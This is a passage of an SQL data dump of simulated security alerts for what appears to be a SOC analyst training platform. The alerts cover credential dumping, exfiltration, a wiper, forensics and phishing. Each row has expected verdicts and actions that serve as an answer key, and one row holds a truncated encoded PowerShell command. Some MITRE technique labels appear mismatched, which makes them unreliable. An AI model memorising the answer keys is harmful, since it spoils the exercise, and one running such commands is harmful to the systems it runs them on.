2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(375, 'File Transfer Activity to External Server', 'critical', 'Data Loss Prevention (DLP) System', 'Sensitive information begins to flow out of the network, sent to an external server under the attackers\' control. Advanced techniques are being utilized to exfiltrate data.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"dlp-20231012-001\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_sha256\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"file_name\":\"financial_reports_q3_2023.xlsx\",\"transfer_protocol\":\"HTTPS\",\"transfer_size\":\"15MB\",\"action_taken\":\"Alert Triggered\"}', '2026-01-03 23:52:02', '2026-02-17 05:28:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Lookup\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory Service\",\"verdict\":\"clean\",\"details\":\"Username of employee John Doe.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash with multiple detections as potential data exfiltration malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_reports_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Classification System\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(376, 'Wiper Logic Execution Detected', 'critical', 'Endpoint Detection and Response (EDR)', 'As the operation nears its climax, the wiper logic is activated, threatening to erase critical data under the guise of a ransomware attack. The EDR detected the execution of a known wiper malware file on the endpoint, which matches with advanced threat patterns.', 'Impact', 'T1485: Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_type\":\"process_execution\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"CORP-WIN10-07\",\"process_name\":\"wiper_exe_activated.exe\",\"process_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"initiating_user\":\"jdoe\",\"attacker_ip\":\"185.92.220.45\",\"attack_command\":\"wiper_exe_activated.exe /silent\",\"attacker_domain\":\"malicious-domain.com\",\"detection_method\":\"EDR heuristic analysis\"}', '2026-01-03 23:52:02', '2026-02-17 05:28:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known wiper malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by attacker for command and control.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"wiper_exe_activated.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename of the wiper malware detected on endpoint.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(377, 'Forensic Artifact Recovery Initiated', 'high', 'Incident Response Tools', 'The incident response team has initiated recovery of forensic artifacts to preserve crucial evidence. The operation is aimed at understanding the attack vectors and preventing future occurrences. Advanced techniques were used to collect and analyze data from compromised systems.', 'Containment', 'T1113 - Screen Capture', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"IR-20231015-0023\",\"source_ip\":\"192.168.1.15\",\"detected_malware\":{\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_tool.exe\"},\"attacker_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"forensic_artifacts\":[{\"type\":\"memory_dump\",\"filename\":\"memdump_20231015.raw\"},{\"type\":\"disk_image\",\"filename\":\"disk_image_20231015.img\"}],\"action\":\"artifact_recovery_initiated\",\"status\":\"success\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address assigned to compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with advanced persistent threat.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"malicious\",\"details\":\"Detected as part of the ongoing investigation into the breach.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual activity patterns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'IR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(378, 'Mitigation and Remediation Measures Implemented', 'medium', 'System Recovery Logs', 'The recovery team has successfully deployed remediation measures to neutralize the threat and restore affected systems. Mitigation strategies included blocking identified malicious IP addresses and resetting credentials for compromised user accounts.', 'Recovery', 'T1556 - Credentials from Password Stores', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:23:45Z\",\"event_id\":\"RECOVERY-20231015-0001\",\"source\":\"system_recovery\",\"action\":\"remediation_implemented\",\"affected_systems\":[{\"hostname\":\"server1.internal.network\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.15\",\"malicious_ip\":\"198.51.100.34\",\"compromised_user\":\"j.doe\",\"affected_files\":[{\"filename\":\"malicious_payload.exe\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}],\"remediation_actions\":[\"blocked_ip\",\"reset_credentials\",\"removed_malicious_files\"]}]}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAudit\",\"verdict\":\"internal\",\"details\":\"User account had unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:31:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:30:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:29:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:28:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(379, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT1 has initiated the attack by sending a spear-phishing email containing a malicious attachment to gain initial access.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"email_id\":\"c2b2d5f8-8f5a-4e6b-bef8-7b2d1e2e9f30\",\"from\":\"attacker@maliciousdomain.com\",\"to\":\"victim@targetdomain.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_2023.pdf.exe\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a trojan used by APT1.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Abuse DB\",\"verdict\":\"malicious\",\"details\":\"IP used in previous phishing 